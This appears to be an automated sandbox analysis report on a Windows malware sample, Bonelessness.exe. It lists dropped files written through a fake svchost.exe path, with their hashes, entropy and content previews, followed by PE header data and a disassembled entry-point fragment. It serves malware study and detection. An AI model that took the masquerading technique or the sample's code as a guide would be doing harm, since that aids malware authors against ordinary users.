                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):4.470551863591405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                              MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                              SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                              SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                              SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):4.470551863591405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                              MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                              SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                              SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                              SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (10731), with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):42957
                                                                                                                                                                                                              Entropy (8bit):6.0662381358164685
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:CiBtrifZVO7Wg3hIBY1P0NY7JXwNAk07VjAkpAk/AkyAks5y+PdiGPtYbcq:C8Cg3N8KFwVkZPtYbcq
                                                                                                                                                                                                              MD5:62DD18B056C55F5C4A6A679969B9EC09
                                                                                                                                                                                                              SHA1:8ED511EC43ECB810AFDF58F73792341EE559E291
                                                                                                                                                                                                              SHA-256:8FA8FB7E333A1972D6FC3DE209556A75ECAE4918834015C1799CBD4D803D449A
                                                                                                                                                                                                              SHA-512:1674C32123A4E637BCC8F425D4803F038773CE2727877C6A93D0774DD1C071EC7CA612C4AD24B74A719626A913205A5DCE967FD610A1675047F3FD9C5388CD83
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                              Entropy (8bit):4.43096450882803
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                              MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                              SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                              SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                              SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):24649
                                                                                                                                                                                                              Entropy (8bit):7.9805373175957826
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:P0YZ3Jjaxk9sU4B5xLlrzEoqsdNDRXY0F/6sstkMA3geAaD47owr:dZ3VGB5h6iNtoqpbQeR47owr
                                                                                                                                                                                                              MD5:47FD1D45FC00D6C4907A204812B6526C
                                                                                                                                                                                                              SHA1:B257C32FE7479CC7154DFD2F1B7E3F42CF522A3E
                                                                                                                                                                                                              SHA-256:84B9C42160AAEC75D3BEC21253D9D43509BEEB5D191B7AAEE1DB44FBF0A51948
                                                                                                                                                                                                              SHA-512:DFDBD40DEEB6D3865F656CC1715EF0A202979A8B49A70E21EBA6B56D3C452F2D88444C3A742337F4600F023B0E7789547035EEA292BA4195F9845BA5F5883DF5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.Z.".....O.m..-..&.u....v.....m...^.c..L.i..pZ..L#..E2..E..r..1.+..}.p.3...iH5.&f..`r..Y.p..c....p.D.l.n .)..%..l...p.....s......h...e....g.5..I.....<#.;/..5Z..*r.@....t..`dU:....G+U..Y..,..\X.R......... T.!.J..*s..,.%.-.....h..U..OT...f.h._..zf..^.".1.D.)"<..]Z.9..`..f4P..C\...@..n.'...li?=...I....{G...j.R.L5.JK=....S..6.BJ_Y_.((.IFb....,.>*..w...........$"..~...5..gk..~.07u.....7O...&.IlU.O..b.@.%.(9....j...d.%.7c.*#{K,.......6.V..Q0.....Ot.r.'.f.p.[.A.<..l@.".).....4.......].J.H.tN'..M.&..n.k.;.S.b.7...........J..f(....b.<....>.....NdIWm....{...(;$H....<.............l..+~..o.Nk.N...O...E..F.'%..s.#...\..{S...DE7*aX...~o.......#...f....c.K..B.M.b;..Jom.........Z..t.Y....l....n.O.pn...&..$&.........<.........0.,.M.3.........SCb..&\.L..Y.C.vD.(./...$u.V.=......U".~..
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25126
                                                                                                                                                                                                              Entropy (8bit):7.98341092582159
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:EHRva/n308nlnFMirDjlH/6QiOyNGXhnCvdqB2ENIvwl/OZ/Ph4+crtJt7/ECFjN:Etak8nl3r9HtbnCVCNl/OpUPp/ECFW6F
                                                                                                                                                                                                              MD5:461BDEC3E148639E2E9CE5528BD9474F
                                                                                                                                                                                                              SHA1:24DA229B9E2C834E4B8B730BFDA6A9387C147CDE
                                                                                                                                                                                                              SHA-256:7123863EE76057C14BD46E7A2B623A5BA7E42DB6BF196EBA601D4E6B3E8B23BA
                                                                                                                                                                                                              SHA-512:DC86EB418C9556A09BD751C1C32841B9072E7ADAC6A2BC2F9AF9A3D53122B81D892461A97B209EBD137D96A73D4FEFE8FFE6DAF1E28E3D2DD3DC9CD28C0B603A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g...y.......9..W..h............S...dW[+.XP{.+c-Y.AE..T7..].S<.....;....d. `.mk.=.tI..`r..Y.p..c....p.D.l.n .)..%..l...p.....s......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....fY..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J*...|..d|..m.3 $...x......0.Ww.....l.h.j.m-...~..+.#..v{.*!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:[c.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):481
                                                                                                                                                                                                              Entropy (8bit):7.562219197329084
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:NGjx1vBGFaAKSM9FVyxVFMqiEAzTjCE7x3UOn4rN:MfvsFDKPMhMqnAzSCU4a
                                                                                                                                                                                                              MD5:12C0B717F2C7635A939EA3983996CC9D
                                                                                                                                                                                                              SHA1:E9F5A230A788A8E7A3E9250D26FB2278889178A9
                                                                                                                                                                                                              SHA-256:BA5D229C372021666B90D7FD751FA6DD77FA1C1379A1DB0329FA6278B8B65A13
                                                                                                                                                                                                              SHA-512:422E5A1B5E7F9077739ACD977DADF7D91D01622EDF9CB93827C2349D7212049AF35C548C6335D8762C35E7B5B0C1C9F0D3C7E6881BA503199496DC8ED41DE1A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....tp.y)x`.T...x.6.wz.&.=Y..M4.".....+.....+.AQ....8.5...n',)...Q...k....C%!.;.l*}..m#.=..R-a7...o....*...L.?.sG..Z.Y....f.....D...#=.....D...^."..."..0>.Y..z0L....N{.VB+......4.@..N..=.v.:...:.(..m..[.x-.d,C.(pU}.r...B...Y.fs.'..?../.\..X.k>...qz..3>...R..."f.|..^.~.|.xg..~.In.w...}.."..U.....FB............_.R....}...?..GA..eC(\.V..e...!7.....8#^=.z......J.T..?...e...$R.7l.Y:?f.P~.:."......s...H......cC2.T^.{{....+.m.R..~iE.J..t...v..t;C..R_......$.(...ej
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):593
                                                                                                                                                                                                              Entropy (8bit):7.626935561277827
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                              MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                              SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                              SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                              SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....
                                                                                                                                                                                                              Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):25019
                                                                                                                                                                                                              Entropy (8bit):7.981231117049654
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:nARva/n308nlnFMirDjlH/6QiOyNGQMp0I/221czmWLtTBsI6WsXI0o3C+0A:n4ak8nl3r9Htbp0gc/s/Ho3CVA
                                                                                                                                                                                                              MD5:1CC73FD531132773CB4B8B32224E0B75
                                                                                                                                                                                                              SHA1:6907F8E87C28568D43BAF43A91FC84BD485BC4CD
                                                                                                                                                                                                              SHA-256:B156E1BF76080AA763F83B47F4B67E78F94DF8721D5D0130C97087529195D005
                                                                                                                                                                                                              SHA-512:A7A27D85896D384861CA69D2E2AEA8F6460E58AFDD7BFDDC91108E0C43207970E3CD0DAEFC14F7248703760DA1EB961D1194B91DEC40CA9DC74F46B306A7DCEE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g.$.%......P.C..(......:..e>....M....s3v/.*2}.q'd..X'..8.../.fq.+.....u.~.'H.R.g..J]..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J*...|..d|..|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.*!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Bonelessness.exe
                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                              Size (bytes):213504
                                                                                                                                                                                                              Entropy (8bit):7.832692092575605
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:7JRDxRqdSqQts6iRZsTZuDbhivDVDN8zqF3:7cjQKUZigDVJ5
                                                                                                                                                                                                              MD5:579DA5BACB532A6B1670BE4418070F62
                                                                                                                                                                                                              SHA1:36BDCEB0C09265C5CE44E78FA0D119206CF73964
                                                                                                                                                                                                              SHA-256:4DF5F54B69B3F06A10CAAE2D02A298E8DEFD85B9010C7B787AECFBF5A203EDEB
                                                                                                                                                                                                              SHA-512:B4BC147B1BF581E56AB930EDAF26A90419CCE051577F1897473FD8B94BAE16214D77914E7141FEAD6712CFCD7893EC2F817FC79560237D83B3F34BB1CCC6A1C0
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..:.................4......8....0...0........@..................................).].....................................q.......P.........................n...\................................................................................ZYkKE..............................@..@.peSRE...3...0...4... .............. ..`.ig.....aC...p.......T..............@..@.data............ ...b..............@....LI................................@..@.rsrc.......P......................@..@.reloc..n............>..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Bonelessness.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Entropy (8bit):7.832692637897904
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                              File name:Bonelessness.exe
                                                                                                                                                                                                              File size:213'504 bytes
                                                                                                                                                                                                              MD5:475feaf47584ea0673437174181f5019
                                                                                                                                                                                                              SHA1:be7f60898bf6e108aadc370b7ba9c3135bbfb4ee
                                                                                                                                                                                                              SHA256:55bfe580ad47b8c5981ee39c1b267903ded5888ae93c474b19e31f18caa05e51
                                                                                                                                                                                                              SHA512:4165c63f466939b7c38174315928f9acca949e2cbc523b7bb67c6ecd27ea34b1ed67d735af18dc39904c29e4c795cb5d90ce14ef1608260a01b4dc1e7529dc66
                                                                                                                                                                                                              SSDEEP:6144:KJRDxRqdSqQts6iRZsTZuDbhivDVDN8zqF3:KcjQKUZigDVJ5
                                                                                                                                                                                                              TLSH:202412B375D6A8EFFA560E7A95BEAD0868FC1CC14B6B45752D003936BCB3402F416C92
                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..:.................4......8....0...0........@...................................^2...................................
                                                                                                                                                                                                              Icon Hash:52ea989898981d99
                                                                                                                                                                                                              Entrypoint:0x403000
                                                                                                                                                                                                              Entrypoint Section:.peSRE
                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                              DLL Characteristics:
                                                                                                                                                                                                              Time Stamp:0x3A15F751 [Sat Nov 18 03:28:17 2000 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                              File Version Major:4
                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                              Import Hash:91c8557273d46cefa6ad80b57deb236d
                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                              mov eax, 00000000h
                                                                                                                                                                                                              push 00000000h
                                                                                                                                                                                                              pop ebp
                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                              mov dword ptr [0040C684h], 00000000h
                                                                                                                                                                                                              mov edx, dword ptr [0040C684h]
                                                                                                                                                                                                              push edx
                                                                                                                                                                                                              call dword ptr [00407048h]
                                                                                                                                                                                                              mov dword ptr [0040C687h], eax
                                                                                                                                                                                                              push 735C6767h
                                                                                                                                                                                                              pop eax
                                                                                                                                                                                                              mov dword ptr [0040C27Bh], 00000000h
                                                                                                                                                                                                              mov esi, dword ptr [0040C27Bh]
                                                                                                                                                                                                              push esi
                                                                                                                                                                                                              mov dword ptr [0040C00Eh], 00000000h
                                                                                                                                                                                                              mov edx, dword ptr [0040C00Eh]
                                                                                                                                                                                                              push edx
                                                                                                                                                                                                              call dword ptr [00407048h]
                                                                                                                                                                                                              mov dword ptr [0040C8ECh], eax
                                                                                                                                                                                                              mov ebx, 30D788ADh
                                                                                                                                                                                                              mov eax, ebx
                                                                                                                                                                                                              mov eax, 00000000h
                                                                                                                                                                                                              and eax, 0FFFFFFFh
                                                                                                                                                                                                              test dword ptr [0040C29Bh], eax
                                                                                                                                                                                                              jne 00007F48588C7173h
                                                                                                                                                                                                              mov esi, 000019E6h
                                                                                                                                                                                                              xor esi, eax
                                                                                                                                                                                                              mov edi, 0000012Eh
                                                                                                                                                                                                              sub eax, edi
                                                                                                                                                                                                              shl eax, 03h
                                                                                                                                                                                                              add dword ptr [0040C460h], eax
                                                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                                                              and ebx, 000000FFh
                                                                                                                                                                                                              or ebx, dword ptr [0040C3DFh]
                                                                                                                                                                                                              je 00007F48588C7162h
                                                                                                                                                                                                              mov esi, 00001F4Ah
                                                                                                                                                                                                              xor esi, ebx
                                                                                                                                                                                                              add ebx, 00000403h
                                                                                                                                                                                                              je 00007F48588C7163h
                                                                                                                                                                                                              inc ebx
                                                                                                                                                                                                              shr ebx, 1
                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                              pop dword ptr [0040C882h]
                                                                                                                                                                                                              mov dword ptr [0040C6E5h], ebx
                                                                                                                                                                                                              mov edx, 00000027h
                                                                                                                                                                                                              sub edx, 57E67618h
